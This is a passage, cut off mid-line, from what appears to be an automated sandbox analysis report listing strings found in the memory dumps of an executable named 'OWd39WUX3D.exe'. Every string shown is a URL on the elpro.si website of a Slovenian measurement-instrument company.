              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/monitoring/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/nivo/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/prenosno/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/regulacija/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/temperatura/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/temperature-2/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/tlak/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/vlaga/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/poplave-2023/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/privacy-policy/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wohler-hd-video-endoskopi/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-admin/admin-ajax.php
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/Elpro_E-64x64.png
              Source: OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/Elpro_E.png
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Analiza-plinov.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Kalibracija.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Nivo.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Regulacija.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Temperatura.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Tlak.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Vlaga.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ELPRO-www-00-HOME-Header-01.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 